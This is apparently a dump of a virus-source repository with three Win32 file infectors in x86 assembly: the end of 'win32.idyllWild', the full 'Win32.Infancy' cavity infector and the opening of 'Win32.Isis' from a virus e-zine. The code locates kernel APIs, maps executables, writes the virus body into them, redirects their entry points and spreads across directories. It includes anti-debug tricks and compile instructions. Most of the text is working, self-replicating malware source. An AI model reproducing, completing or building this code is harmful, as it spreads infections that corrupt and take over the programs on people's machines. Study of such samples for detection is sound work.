xor edx,edx ;zero reg
;
;increase section PhysSize by file alignment units
;until its larger than virus size
;
idyll_infect_fixsize:
add edx,eax ;add filealign
cmp edx,idyll_size ;virus size
jl idyll_infect_fixsize ;loop if section smaller than virus
mov eax,[esi+4]
add eax,[esi]
mov [ebp+offset idyll_sectsize],edx
add edx,ebx
mov [esi],edx ;set new PhysSize
mov [esi-8],edx ;set new VirtSize
pop edx
pop edi
push eax
mov ebx,[edi+28h] ;get entry RVA
add ebx,[edi+34h] ;add imagebase
mov [ebp+offset idyll_hostentry],ebx ;save restart address
mov [edi+28h],edx ;modify host entry RVA in PE header
mov edx,0e0000020h ;object flags:[CERW]
mov [esi+14h],edx ;set flags
call idyll_unmap_close ;unmap and close file
call idyll_mapfile ;
test eax,eax
je idyll_infect_fail
nop
nop
nop
nop
call idyll_testfile ;?
pop ebx
mov edi,[ebp+offset idyll_finddata_add] ;why?
lea esi,[ebp+offset idyll_start]
mov edi,[ebp+offset idyll_mappedadd]
push edi
add edi,ebx
mov ecx,idyll_size ;virus size
rep
movsb ;move virus into victim
pop edi
add edi,[edi+3ch] ;ptr to PE header
mov [edi+58h],'Wild' ;mark file infected
call idyll_unmap_close ;unmap and close file
idyll_infect_return_success:
mov eax,1 ;fucking waste of space to
ret ;return nonzero value
idyll_infect_fail:
call idyll_unmap_close
idyll_infect_return_failure:
xor eax,eax
ret
;
;subroutine to
;determine whether a file can be infected
;in: eax:va of mapped file
;out: eax:zero if file can be infected
;
idyll_testfile:
mov ebx,eax ;va of mapped file into ebx
cmp word ptr [ebx],'ZM' ;exe?
jne idyll_testfile_return_failure;nope abort
nop
nop
nop
nop
add eax,dword ptr [ebx+3ch] ;get ptr to PE header
mov [ebp+offset idyll_peheader],eax
xchg edi,eax ;load ptr into edi
cmp word ptr [edi],'EP' ;a PE?
jne idyll_testfile_return_failure;nope abort
nop
nop
nop
nop
cmp [edi+58h],'Wild' ;already infected?
je idyll_testfile_return_failure;yes abort
nop
nop
nop
nop
add edi,74h
mov ecx,[edi] ;number of interesting rva's
idyll_testfile_rva_loop:
add edi,8 ;skip item
loop idyll_testfile_rva_loop ;so we'll get a ptr to sectiontable
add edi,4
mov [ebp+offset idyll_1stsec],edi;store ptr to 1st entry in
;sectiontable
idyll_testfile_return_success:
xor eax,eax ;and return succes to caller
ret
idyll_testfile_return_failure:
xor eax,eax ;return failure to caller
dec eax
ret
;
;find a function in the victims imports
;(called when infecting to get GetModuleHandleA and GetProcAddress)
;
idyll_infect_find_fn: ;@12B0(84B0)
xor eax,eax
idyll_infect_find_fn_loop:
mov esi,[ebx+4*eax]
cmp esi,0 ;endmarker?
je idyll_infect_find_fn_return_failure
nop
nop
nop
nop
push ebx
mov ebx,esi
call idyll_infect_findimports
inc ebx
inc ebx
mov esi,ebx
pop ebx
push edi
push ecx
repz
cmpsb ;compare names
cmp ecx,0 ;found?
pop ecx
pop edi
je idyll_infect_find_fn_done ;yes
nop
nop
nop
nop
inc eax ;nope,loop
jmp idyll_infect_find_fn_loop
idyll_infect_find_fn_done:
ret
idyll_infect_find_fn_return_failure:
xor eax,eax ;return failure
dec eax
ret
;
;find KERNEL32 string in import module names list
;
idyll_infect_findk32: ;@12E2(84E2)
push edi
push esi
mov ecx,8 ;size of string
push ecx
lea esi,[ebp+offset idyll_dllnamebuffer] ;destination
push esi
;
;uppercase input.
;
idyll_infect_findk32_loop:
mov ah,[edi] ;get char
cmp ah,'a' ;lowercase?
jl idyll_infect_findk32_uppercase ;nope,store char
nop
nop
nop
nop
sub ah,32 ;convert to upper
idyll_infect_findk32_uppercase:
mov [esi],ah ;and store char
inc esi ;increase dest ptr
inc edi ;increase src ptr
loop idyll_infect_findk32_loop ;branch
pop esi ;get ptr back
pop ecx ;get str len back
lea edi,[ebp+offset idyll_k32string] ;ptr to 'KERNEL32' string
repz
cmpsb ;compare strings
mov eax,ecx ;eax hold return value,zero if K32 found
pop esi ;get regs back
pop edi
ret ;return to caller
;
;find the section that contains imports
;
idyll_infect_findimports: ;@1314(8514)
push edi
push ecx
push esi
push eax
mov edi,[ebp+offset idyll_peheader]
mov ecx,[edi+6] ;get object count..bug:oc is a 16bit value
mov esi,[ebp+offset idyll_1stsec] ;ptr to 1st entry in section table
idyll_infect_findimports_loop:
mov eax,[esi+0ch] ;fetch section RVA
cmp ebx,eax ;compare them
jle idyll_infect_findimports_found
nop
nop
nop
nop
add esi,28h ;next section
loop idyll_infect_findimports_loop ;loop
idyll_infect_findimports_found:
je idyll_infect_findimports_found_at_sectionstart
nop ;^
nop ;|
nop ;+--start of imports equals to start of some section?
nop
sub esi,28h ;nope,previous section...
idyll_infect_findimports_found_at_sectionstart:
mov eax,[esi+0ch] ;fetch section RVA
mov ecx,ebx
sub ecx,eax
mov ebx,[esi+14h] ;PhysOffset
add ebx,[ebp+offset idyll_mappedadd]
add ebx,ecx
pop eax
pop esi
pop ecx
pop edi
ret
;
;map the file into the processes address space
;
idyll_mapfile: ;@1357(8557)
mov edi,[ebp+offset idyll_finddata_add];ptr to finddata structure
add edi,2ch ;fix ptr to point to the name of the found file
push edi ;parameter for open
push 80h ;fileattribute normal
push edi ;param for setfileattr
call [ebp+offset idyll_setfileattributesa_add];call fn to set
;file attr to normal
test eax,eax ;failed?
je idyll_mapfile_return_failure ;yes abort
nop
nop
nop
nop
pop edi ;get ptr to filename back
push 0 ;no hTemplate
push 80h ;attribute normal
push 3 ;OPEN_EXISTING
push 0 ;no sa struct
push 0 ;prevents from being shared
push 0c0000000h ;r/w
push edi ;ptr to filename
call [ebp+offset idyll_createfilea_add] ;call CreateFileA()
mov [ebp+offset idyll_handle],eax ;store handle
cmp eax,-1 ;open failed?
je idyll_mapfile_return_failure ;yes abort
nop
nop
nop
nop
;
;now the file's opened..calculate the size of filemapping object
;and map file
;
mov edi,[ebp+offset idyll_finddata_add]
mov edx,[edi._sizelo]
mov ebx,[edi._sizehi]
add edx,[ebp+offset idyll_sectsize]
push 0 ;name of mapping object
push edx ;max size lo
push ebx ;max size hi
push 4 ;PAGE_READWRITE
push 0 ;no sa structure
push eax ;hFile to map
call [ebp+offset idyll_createfilemappinga_add]
mov [ebp+offset idyll_maphand],eax ;store hObject
test eax,eax ;failed?
je idyll_mapfile_return_failure ;yes abort
nop
nop
nop
nop
push 0 ;map entire file
push 0 ;from zero offset
push 0 ;from zero offset
push 2 ;r/w access
push eax ;hObject
call [ebp+offset idyll_mapviewoffile_add];call MapViewOfFile
mov [ebp+offset idyll_mappedadd],eax ;store add of mapped image
test eax,eax ;failed?
je idyll_mapfile_return_failure ;yes abort
nop
nop
nop
nop
ret ;return success(eax nonzero)
idyll_mapfile_return_failure:
xor eax,eax
ret
;
;unmap the file and close handles
;
idyll_unmap_close: ;@13EE(85EE)
mov eax,[ebp+offset idyll_mappedadd] ;address of mapped image
push eax ;sotre parameter
call [ebp+offset idyll_unmapviewoffile_add];unmap file
mov eax,[ebp+offset idyll_maphand] ;hObject
push eax ;store parameter
call [ebp+offset idyll_closehandle_add] ;close file mapping object
mov eax,[ebp+offset idyll_handle] ;hFile
push eax ;store parameter
call [ebp+offset idyll_closehandle_add] ;close file
ret ;return to motherfucking caller
;
;calls GetProcAddress to retrieve fn adds needed for infection
;
idyll_lookup_apis: ;@147F
lea edi,[ebp+offset idyll_apinames];strings of fn names
lea esi,[ebp+offset idyll_apiaddresses];room for fn addresses
idyll_lookup_apis_loop:
mov ax,[edi] ;fetch a word
cmp ax,0 ;end of apinames?
je idyll_lookup_apis_return ;yes return
nop ;nops for b2b match
nop
nop
nop
push esi ;store ptr
push edi ;pass fn add
mov eax,[ebp+offset idyll_k32add] ;hModule of KERNEL32
push eax ;pass param
mov esi,[ebp+offset idyll_getprocaddress_add];add of fn
call esi ;call GetProcAddress
pop esi ;get ptr back
mov [esi],eax ;store fn add
add esi,4 ;fix ptr
xor al,al ;zero reg
or ecx,-1 ;ecx contains 0xFFFFFFFF
inc edi ;inc ptr
repnz ;find end of string (null)
scasb
jmp idyll_lookup_apis_loop;proceed with next fn
idyll_lookup_apis_return:
ret
;
;data needed on virus startup
;
idyll_k32string db 'KERNEL32',0 ;@14BA
idyll_k32add dd 0 ;address of KERNEL32.dll @14C3
;
;these fields are filled during infection and must be fixed
;before executing the 1st generation of the virus
;***note:this makes the whole stuff tasm/tlink dependent
;
idyll_gmh dd offset GetModuleHandleA+2 ;@14C7 GetModuleHandleA
idyll_gpa dd offset GetProcAddress+2 ;@14CB GetProcaddress
dd 0 ;@14CF
dd 0 ;
idyll_gmhstring db 'GetModuleHandleA',0 ;@14D7
idyll_gpastring db 'GetProcAddress',0 ;@14E8
idyll_getmodulehandlea_add dd 0 ;@14F7 fn address
idyll_getprocaddress_add dd 0 ;@14FB fn address
;
;encrypt/decrypt api names
;(i always get wired when i see motherfucking mixing of motherfucking code
;and motherfucking data motherfucking areas motherfucking)
;
idyll_xorloop_on_apinames: ;@14FF
lea esi,[ebp+offset idyll_apinames];ptr to string to crypt
mov ecx,idyll_length_of_apinames;amount to crypt
idyll_xorloop_on_apinames_loop:
mov ah,[esi] ;get byte
xor ah,17h ;crypt byte
mov [esi],ah ;store byte
inc esi ;inc ptr
dec ecx ;has the author heard of the 'loop'
jne idyll_xorloop_on_apinames_loop ;instruction of the x86's?
ret
;
;data related to idyll
;
idyll_length_of_apinames equ idyll_endof_apinames-idyll_apinames
;
;names of functions virus uses for infection
;
idyll_apinames equ $
db 'CreateFileA',0
db 'CreateFileMappingA',0
db 'MapViewOfFile',0
db 'UnmapViewOfFile',0
db 'CloseHandle',0
db 'VirtualAlloc',0
db 'VirtualFree',0
db 'FindFirstFileA',0
db 'FindNextFileA',0
db 'SetFileAttributesA',0
db 'GetLastError',0
dw 0 ;endmarker
idyll_endof_apinames equ $
;
;api adds will be stored here
;
idyll_apiaddresses equ $
idyll_createfilea_add dd 0 ;@15B7
idyll_createfilemappinga_add dd 0
idyll_mapviewoffile_add dd 0
idyll_unmapviewoffile_add dd 0
idyll_closehandle_add dd 0
idyll_virtualalloc_add dd 0
idyll_virtualfree_add dd 0
idyll_findfirstfilea_add dd 0
idyll_findnextfilea_add dd 0
idyll_setfileattributesa_add dd 0
idyll_getlasterror_add dd 0
idyll_hostentry dd offset host_start ;host erva @15E3
idyll_filemask db '*.exe',0 ;filemask for searches @15E7
idyll_findhandle dd 0 ;@15ED handle for file searches
idyll_finddata_add dd 0 ;@15F1 address of finddata structure
idyll_handle dd 0 ;@15F5 handle of open file
idyll_maphand dd 0 ;@15F9 handle of file mapping object
idyll_mappedadd dd 0 ;@15FD address of mapped file
idyll_peheader dd 0 ;@1601 ptr to PE header
idyll_1stsec dd 0 ;@1605 ptr to 1st entry in object table
idyll_sectsize dd 0 ;@1609
idyll_x dd 0 ;@160D
idyll_dllnamebuffer db 20 dup(0) ;@1611
idyll_text db '[win32.idyllWild]',10,13
db 'take me in your arms of velvet...',10,13
db 'kiss me with satin...',10,13
db 'drown me.',10,13
idyll_end equ $
end fixups ;we will start fixup routine first
Win32/Infector/Win32.Imports.asm
+1106
View File
File diff suppressed because it is too large Load Diff
Win32/Infector/Win32.Infancy.asm
+565
View File
@@ -0,0 +1,565 @@
;????????????????????????????????????????????????????????????????????????????»
;? win32.infancy (c)oded by shitdown [mions] in feb-18-2001, alfa version ?
;? non-dangerous, non-resident pe cavity ring3 direct-action infector ?
;?????????????????????????????????????????????????????????????????????????????
;? this code is optimised for size by technique, not by asm :( ?
;?????????????????????????????????????????????????????????????????????????????
;?????????????????????????????????????????????????????????????????????????????
;? description:? ?
;??????????????? ?
;? name : win32.infancy (win32 teoretically, tested on win98 :-) ?
;? author : shitdown (http://shitdown.sf.cz, email: shitdown@sf.cz) ?
;? origin : czech republic ?
;? size : 540 bytes ?
;? infects : .exe pe files ?
;? payload : no ?
;? strings : no ?
;? encrypt : no ?
;? resident : no ?
;? cavity : yes ?
;? anti-debug : yes, 0cch api callgate fucks td32 ?
;? anti-emu : yes,non-standard playing with seh ?
;? anti-av : no ?
;?????????????????????????????????????????????????????????????????????????????
;? simple example tiny virus, shows how to use ?
;? structured exception handling ?
;? kernel is determined by standard way (pop eax/push eax) ?
;? at start, apis is located at fly (when is needed) ?
;? ( push crc32 of api / int 3 ) - crc32 api names, ?
;? virus can be easy detected / cleaned by generic scaner ?
;? virus doesn't needs write permission to section - ?
;? - all variables will be allocated dynamically on stack ?
;? virus searches & infects all files in 10 up-directories; ?
;? (cd .. / infect_all, cd .. / infect_all :) ?
;? this cute code is designed to use 'holes' in code ?
;? section, virus doesn't increase host size. ?
;? this code is not purposed to be world-wide :) ?
;? so, only for study purposes. ?
;? ?
;?how to compile: ?
;? tasm32 -ml -m9 -q -zn -z infancy.asm ?
;? tlink32 -r -m -s -M -Tpe -c -ap infancy.obj ?
;?how to debug: ?
;? set 'softice' definition to '1', compile, go to softice and type ?
;?'i1here on' and run infancy.exe file. ?
;???????????????????????????????? ?
;?fuck the windows, linux rocks!? ?
;?????????????????????????????????????????????????????????????????????????????
.386p ;nice machines :)
.model flat ;why ? why not !
softice = 0
dir_depth = 10 ;10 up-directories
.data
dummy dd ?
; ?????????????????
;??????????????????????????? needed macroz ???????????????????????????????????
; ?????????????????
;
;???????????????
;? crc32 macro ?
;???????????????
crc32_magic = 0c1a7f39ah
crc32 macro string
crcreg = 0ffffffffh
irpc _x, <string>
ctrlbyte = ('&_x&' and 0dfh) xor (crcreg and 0ffh)
crcreg = crcreg shr 8
rept 8
ctrlbyte = (ctrlbyte shr 1) xor (crc32_magic * (ctrlbyte and 1))
endm
crcreg = crcreg xor ctrlbyte
endm
dd crcreg
endm
;??????????????????
;? api call macro ?
;??????????????????
api macro apiname
db 68h
crc32 <apiname>
db 0cch
endm
;????????????????????????????
;? softice breakpoint macro ?
;????????????????????????????
break macro
if softice
int 01
endif
endm
; ????????????????????????????
;???????????????????????? here starts code section ???????????????????????????
; ????????????????????????????
.code
go:
virus_start:
;??????????????????????????????????????????????????????
;? try to get kernel address, using 'standard' method ?
;? pop eax / push eax, function is protected by seh ?
;??????????????????????????????????????????????????????
pop eax ;kernel address
push eax ;to eax
xor ax, ax
k32_scan_next:
push eax ;for restorin'
;by seh
call set_k32_scan_seh
k32_scan_seh:
pop ecx ;esp+8
pop ecx
pop esp ;mov esp, [esp+8]
k32_scan_mismatch:
pop ecx ;remove old seh
pop ecx
pop eax ;restore last
;kernel address
add eax, 0-10000h
jmp short k32_scan_next ;try again
set_k32_scan_seh:
xor ecx, ecx
push ecx
mov dword ptr fs:[ecx], esp
cmp word ptr [eax], 5a4dh
jne short k32_scan_mismatch
k32_found:
pop eax ;remove old seh
pop ecx
pop ebp
;?????????????????????? create handler for virus-services ?????????????????????
call get_handler_offset
;????????????????????????????????????????????????????????????????????
;? here is an entrypoint of exception gate, if any exception occurs ?
;? (including 0cch opcode call), this code will be executed ?
;????????????????????????????????????????????????????????????????????
exception_handler:
pushad ;save all registerz
mov esi, [esp+4+20h] ;exception code
lodsb ;exception number
cmp al, 3 ;virus request ?
je short exception_virus_request ;yah
;????????????????????????????????????????????????????????????????
;? only handled exception is int 0x3 - virus api gateway, other ?
;? exceptions is page faults, invalid opcodes etc, then virus ?
;? tryes jump to original host ?
;????????????????????????????????????????????????????????????????
other_exception:
break
mov esp, [esp+8+20h]
pop eax ;remove old seh handler
pop eax
call get_eip
get_eip:
db 81h, 2ch, 24h ;sub [esp], old_host
old_host dd -((offset fake_host-offset go)-(offset get_eip-offset go))
ret
;??? virus interrupt / request
exception_virus_request:
mov esi, [esp+0ch+20h] ;context-block
add esi, 0b4h ;pointer
lodsd ;to saved ebp
xchg eax, ebp ;ebp-base of kernel
mov edi, esi ;for edi storing
lodsd ;load eip to eax
xchg eax, esi ;in esi is eip
;??? fix win9x bug
lodsb
cmp al, 0cch
je short no_w9x_bug
dec esi
no_w9x_bug:
;???????????????????????????????????????????
;? in esi is return addres (after int 03h) ?
;? in edi is pointer to stack stored eip ?
;???????????????????????????????????????????
mov ebx, [edi+12] ;esi points to dword on stack
xchg [ebx], esi ;xchange crc32 <> return addr
mov ebx, esi ; :( crc32 to ebx
;?????????????????????????????????????????
;? okay, now i must call those crazy api ?
;? in ebp is kernel address ?
;?????????????????????????????????????????
mov esi, [ebp+3ch] ;pe header to esi
mov esi, [esi+ebp+78h] ;export table to esi
lea esi, [esi+ebp+1ch] ;offset of 'address table'
lodsd ;address table
push eax ;save 'address table'
lodsd ;name table to eax
push esi ;save pointer to ordinal table
lea esi, [eax+ebp]
mov ecx, ebp ;counter of api
try_next_api_name:
lodsd ;in eax pointer to string
add eax, ebp
;???? crc32 code ?????????????????????????????????????????????????????????????
;? ? input: eax - offset to name ? ?
; ? output:edx - crc32 ?
; ???????????????????????????????
get_crc32:
push esi
xchg eax, esi
xor edx, edx
dec edx
crc_next_byte:
lodsb
and al, 0dfh ;i hate uppercase :)
jz short crc_finish
xor dl, al
mov al, 08h
crc_next_bit:
shr edx, 01h
jnc short crc_no_change
xor edx, crc32_magic
crc_no_change:
dec al
jnz short crc_next_bit
jmp short crc_next_byte
crc_finish:
pop esi
;? ?
;?????????????????????????????? end of crc32 ?????????????????????????????????
inc ecx
inc ecx
cmp edx, ebx ;hit ?
jne short try_next_api_name
;????????????????????????????????????????????
;? yahooo, api hit! ?
;? in ecx is api index (starting from 1 !!) ?
;????????????????????????????????????????????
pop esi ;restore *ordinal_table
lodsd ;in eax pointer to ordinal table
movzx ecx, word ptr [eax+ecx-2] ;in ecx is now ordinal (0..x)
pop eax ;in esi is ptr address table
add eax, ebp
mov eax, [ecx*4+eax] ;and jump to api :)
add eax, ebp
stosd
popad
xor eax, eax
ret
;? ?
;???????????????????????????? end of virus-handler ???????????????????????????
;????????????????????????? here starts infection engine ??????????????????????
;? ?
infect:
xor esi, esi
lea ebx, [esp+44+2*4] ;filename to ebx
;??? at first, i must open file for read & write
push esi ;file attributes
push esi ;""
push 3 ;open existing
push esi ;security=default
push esi ;no sharing
push 0c0000000h ;generic read & write
push ebx ;file name
api <createfilea> ;open!
inc eax ;-1+1=0 ?
jnz short infect_continue
retn
infect_continue: ; yes, this is error
dec eax ; handle to eax
push eax ;save for future use
;??? now create file mapping
push esi ;no filename handle
push dword ptr [esp+32+4*4] ;maximal size of file
push esi ;no min. size
push 4 ;page read & write
push esi ;no security
push eax ;mapped file handle
api <createfilemappinga>
push eax ;save for future use
;??? and map file to memory
push dword ptr [esp+32+4*4] ;count of bytes to map
push esi ;blah...
push esi ;
push 2 ;read & write
push eax ;map-handle
api <mapviewoffile>
;??? yahoo, in eax is mapped file
mov ebx, eax
cmp word ptr [eax], 5a4dh ;exe file ?
jne short @unmap_file
cmp word ptr [eax+18h], 0040h
@unmap_file:
jne short @@unmap_file
add ebx, [eax+3ch]
cmp word ptr [ebx], 4550h ;is this pe header ?
@@unmap_file: jne short unmap_file ;no
xchg edx, eax ;imagebase to edx
push ebx ;save pe header
break
movzx eax, word ptr [ebx+14h]
add ebx, eax
test byte ptr [ebx+18h+24h], 20h ;executable ?
jz short _unmap_file ;no :(
code_section_found:
;??? okay, in ebx+18h is section record
break
mov ecx, dword ptr [ebx+18h+10h] ;raw_size
cmp ecx, dword ptr [ebx+18h+08h] ;raw_size>virtual size ?
jc short _unmap_file ;raw size too small, go away
mov esi, [ebx+18h+14h] ;raw address of section in esi
add esi, edx ;esi points to start of .code
mov eax, [ebx+18h+0ch] ;relative virt. addr to eax
;????????????????????????????????????????????????????????????????????
;? esi - pointer to code, ecx - count of bytes left, edi - counter ?
;? eax - offset of cave (rva) ?
;????????????????????????????????????????????????????????????????????
;???? current stack dump ????????????????????»
;? [esp] ? memory mapped pe header ?
;? [esp+4] ? map handle ?
;? [esp+8] ? file handle ?
;? [esp+12] ? offset of after_infect: label ?
;? [esp+16] ? file search handle ?
;? [esp+20] ? start of win32_find_data ?
;? [esp+48] ? 100% null-filled 4bytes :)) ?
;?????????????????????????????????????????????
; push dword ptr [ebx+0ch+18h] ;save virtual addr
; mov dword ptr [esp+20], [ebx+0ch+18h]
xor edi, edi
hole_mismatch:
add [esp+48], edi
add esi, edi
xor edi, edi
push esi ;save address
holes_search:
dec ecx
pop eax ;clean stack
js short _unmap_file
push eax
inc edi ;counter of found bytes
lodsb
test al, al
jz short holes_search
cmp al, 0cch
jz short holes_search
cmp al, 0c3h
jz short holes_search
hole_end:
db 66h, 81h, 0ffh ;cmp di, virus_size
dw virus_size+4
pop esi ;restore saved address
jc short hole_mismatch ;no :(
break
hole_found:
lodsd
;??????????????????????????????????????????????????????
;? yah, in stack is rva of cave, in esi cave address ?
;? in edi size of cave ?
;??????????????????????????????????????????????????????
; push dword ptr [ebx+18h+10h] ;raw size
; pop dword ptr [ebx+18h+08h] ;=virtual size
mov edi, esi ;in edi offset of cave
mov esi, [esp+12] ;offset infect to esi
sub esi, offset after_infect - offset go ;offset of go to esi
; push esi
mov ecx, virus_size ;virus size to ecx
rep movsb ;and move the virus !!
; pop esi ;in esi offset of infect:
;??? in edi is offset virus_end
sub edi, virus_end-old_host
mov ecx, [esp+48] ;addres relative to cave
lea ecx, [ecx+4]
add ecx, [ebx+0ch+18h] ;rva of section
pop ebx ;pe header in ebx
lea eax, [ecx+get_eip-go]
xchg [ebx+28h], ecx ;set entrypoint to virus
sub eax, ecx
;?????????????????????????????????????????????????????????????????????
;? old_host = rva_of_virus+(offset get_eip-offset go)-entrypoint_rva ?
;?????????????????????????????????????????????????????????????????????
stosd ;and store return adress
push eax
_unmap_file:
xchg edx, eax
pop ecx ;remove shit (pe header)
;unmaps file, in eax must be address of mapped file
unmap_file:
push eax
api <unmapviewoffile>
db 0bbh ;mov ebx, crc32 <closehandle>
crc32 <closehandle>
push ebx
db 0cch ;close mapping handle
pop edi
lea esi, [esp+20+2*4]
push esi
sub esi, 8
push esi
sub esi, 8
push esi
push edi
api <setfiletime>
push edi
push ebx
db 0cch ;close file handle
push 21h ;make file read-only
add esi, 40h
push esi
api <setfileattributesa>
unmap_file_end:
infect_file_end:
retn
infect_end:
;? old_host = rva_of_virus+(offset get_eip-offset go)-entrypoint_rva ?
;?????????????????????????? here ends infection engine ???????????????????????
get_handler_offset:
;--- setup handler for virus services / exeption handling
break
push eax
mov dword ptr fs:[eax], esp
push dir_depth
mov ah, 2 ;512
sub esp, eax ;place for old directory
push esp ;buffer offset
push eax ;buffer len
xchg eax, ebx
api <getcurrentdirectorya>
;???????????????????????????????????????????????????????
;? main infection routine: ?
;? searches for *.exe and for ..\*.exe and infect them ?
;???????????????????????????????????????????????????????
sub esp, ebx ;size of (ffdata)
find_first:
push esp ;offset of data buffer
call get_mask
db "*.exe", 0
get_mask:
api <findfirstfilea>
dir_search:
push eax ;save search handle
call infect
after_infect:
pop esi
push esp
push esi
api <findnextfilea>
dec eax
xchg eax, esi
jz short dir_search
next_directory:
push eax
api <findclose> ;close search handle
mov dword ptr [esp], '..'
push esp
db 0bbh
crc32 <setcurrentdirectorya>
push ebx
db 0cch
; api <setcurrentdirectorya> ;go to next up directory
dec dword ptr [esp+1024]
jnz short find_first
cdq ;edx=0
mov dh, 2
add esp, edx
push esp
push ebx
db 0cch
; api <setcurrentdirectorya>
int 4
virus_end:
virus_size = $-virus_start
;???????????????????
;?end of virus game?
;???????????????????
; ??????????????????
;??????????????????????????????? fake host part ??????????????????????????????
; ??????????????????
msg:
db "win32.infancy."
db '0'+virus_size/100 mod 10
db '0'+virus_size/10 mod 10
db '0'+virus_size mod 10
db 13, 10, "(c)oded by shitdown in jul-2000, http://shitdown@sf.cz, shitdown@sf.cz", 13, 10
db "welcome to first generation!", 13, 10
msg_len = $-msg
db 1024 dup(?)
fake_host:
;--------------- same kernel scanner
pop eax ;kernel address to eax
push eax
xor ax, ax
_k32_scan_next:
push eax ;for restorin' by seh
call _set_k32_scan_seh
_k32_scan_seh:
pop ecx ;esp+8
pop ecx
pop esp ;mov esp, [esp+8]
_k32_scan_mismatch:
pop eax ;restore last kernel address
pop ecx ;remove old seh
pop ecx
add eax, 0-10000h
jmp short _k32_scan_next ;try again
_set_k32_scan_seh:
push eax
xor ecx, ecx
mov dword ptr fs:[ecx], esp
cmp word ptr [eax], 5a4dh
jne _k32_scan_mismatch
_k32_found:
pop ebp ;eax
pop eax ;remove old seh
pop eax
;-----------------------------------
xor ecx, ecx
push offset exception_handler
push ecx
mov dword ptr fs:[0], esp
push -11 ;get a standard handle
api <getstdhandle>
push 0
push offset dummy
push msg_len
push offset msg
push eax
api <writefile>
push 0
api <exitprocess>
end go
;heh, thats all
Win32/Infector/Win32.Infinite.asm
BIN
View File
Binary file not shown.
Win32/Infector/Win32.Isis.asm
+964
View File
@@ -0,0 +1,964 @@
COMMENT ` ---------------------------------------------------------------- )=-
-=( Natural Selection Issue #1 -------------------------------- Win32.Isis )=-
-=( ---------------------------------------------------------------------- )=-
-=( 0 : Win32.Isis Features ---------------------------------------------- )=-
Imports: Copies LoadLibraryA and GetProcAddress from hosts [it will
only infect files that already Import both]
Infects: PE files with an .EXE extension by expanding the last
section, but without setting the write bit
Strategy: With a fully recursive directory scanning engine that
doesn't enter directories more than once per run
Compatibility: 95/98/ME/NT/2000 Compatible, avoids Win2K SFC'd files
Saves Stamps: Yes
MultiThreaded: No
Polymorphism: None
AntiAV / EPO: None
SEH Abilities: None
Payload: Displays a MessageBoxA
-=( 1 : Win32.Isis Design Goals ------------------------------------------ )=-
: To test an implementation of MASMs type checking on API and PROC calls.
: To place all virus data into one structure that can be stack hosted, so the
write bit does not need to be set in infected sections.
: To serve as a test virus for a fast, recursive directory scanner, which does
not visit the same directory twice, and uses only stack data.
: To use Imports through GetProcAddress/LoadLibraryA, which are stolen in
hosts that already import them.
When it was finished, a friend's pet rat had died, her name was Isis, and so
the virus was named in its memory. Besides it's a nice virus name too.
-=( 2 : Win32.Isis Design Faults ----------------------------------------- )=-
While it did achieve all of the design goals, its structure really needs a lot
of work, especially to clean up the data tables. When infecting some PE
files, headers and sections can be incorrectly calculated [rarely], so that
would also need to be modified. Finally, a lot of the variables are badly
named.
-=( 3 : Win32.Isis Disclaimer -------------------------------------------- )=-
THE CONTENTS OF THIS ELECTRONIC MAGAZINE AND ITS ASSOCIATED SOURCE CODE ARE
COVERED UNDER THE BELOW TERMS AND CONDITIONS. IF YOU DO NOT AGREE TO BE BOUND
BY THESE TERMS AND CONDITIONS, OR ARE NOT LEGALLY ENTITLED TO AGREE TO THEM,
YOU MUST DISCONTINUE USE OF THIS MAGAZINE IMMEDIATELY.
COPYRIGHT
Copyright on materials in this magazine and the information therein and
their arrangement is owned by FEATHERED SERPENTS unless otherwise indicated.
RIGHTS AND LIMITATIONS
You have the right to use, copy and distribute the material in this
magazine free of charge, for all purposes allowed by your governing
laws. You are expressly PROHIBITED from using the material contained
herein for any purposes that would cause or would help promote
the illegal use of the material.
NO WARRANTY
The information contained within this magazine are provided "as is".
FEATHERED SERPENTS do not warranty the accuracy, adequacy,
or completeness of given information, and expressly disclaims
liability for errors or omissions contained therein. No implied,
express, or statutory warranty, is given in conjunction with this magazine.
LIMITATION OF LIABILITY
In *NO* event will FEATHERED SERPENTS or any of its MEMBERS be liable for any
damages including and without limitation, direct or indirect, special,
incidental, or consequential damages, losses, or expenses arising in
connection with this magazine, or the use thereof.
ADDITIONAL DISCLAIMER
Computer viruses will spread of their own accord between computer systems, and
across international boundaries. They are raw animals with no concern for the
law, and for that reason your possession of them makes YOU responsible for the
actions they carry out.
The viruses provided in this magazine are for educational purposes ONLY. They
are NOT intended for use in ANY WAY outside of strict, controlled laboratory
conditions. If compiled and executed these viruses WILL land you in court(s).
You will be held responsible for your actions. As source code these viruses
are inert and covered by implied freedom of speech laws in some
countries. In binary form these viruses are malicious weapons. FEATHERED
SERPENTS do not condone the application of these viruses and will NOT be held
LIABLE for any MISUSE.
-=( 4 : Win32.Isis Compile Instructions ---------------------------------- )=-
MASM 6.15 and LINK 6.00.8447
ml /c /Cp /coff /Fl /Zi Isis.asm
link /debug /debugtype:cv /subsystem:windows Isis.obj
-=( 5 : Win32.Isis ------------------------------------------------------- ) `
.386p ; 386 opcodes
.model flat,stdcall ; Written for flat Win32
option casemap:none ; Use mixed case symbols
include masmwinc.inc ; Win32 constant symbols
includelib c:\masm32\lib\kernel32.lib ; First-run imported API
ExitProcess PROTO :DWORD
LoadLibraryA PROTO :DWORD
GetProcAddress PROTO :DWORD, :DWORD
Host SEGMENT 'CODE'
push 0
call ExitProcess
call LoadLibraryA
call GetProcAddress
Host ENDS
; =============================================================================
; ( Virus Constants, Protos, and Macros ) =====================================
; =============================================================================
FRUN_HOSTSRVA EQU 3000H
FRUN_VIRUSRVA EQU 5000H
FRUN_LOADLIBRARYA EQU 9060H
FRUN_GETPROCADDRESS EQU 9064H
GAME_OVER_MAX EQU 6
AVOIDED_FILES EQU FILE_ATTRIBUTE_DEVICE OR FILE_ATTRIBUTE_TEMPORARY OR \
FILE_ATTRIBUTE_SPARSE_FILE OR FILE_ATTRIBUTE_REPARSE_POINT OR \
FILE_ATTRIBUTE_OFFLINE OR FILE_ATTRIBUTE_COMPRESSED OR \
FILE_ATTRIBUTE_ENCRYPTED
DO_API MACRO PARAM:VARARG
PUSHAD
INVOKE PARAM
MOV [ESP+1CH], EAX
POPAD
ENDM DO_API
CompareStringM MACRO STRING1:REQ, STRING2:REQ
DO_API tCompareStringA PTR [esi + VX.pCompareStringA], \
LOCALE_SYSTEM_DEFAULT, NORM_IGNORECASE, STRING1, -1, \
STRING2, -1
ENDM CompareStringM
CreateFileM MACRO FILENAME:REQ
DO_API tCreateFileA PTR [esi + VX.pCreateFileA], FILENAME, \
GENERIC_READ OR GENERIC_WRITE, 0, 0, OPEN_EXISTING, \
0, 0
ENDM CreateFileM
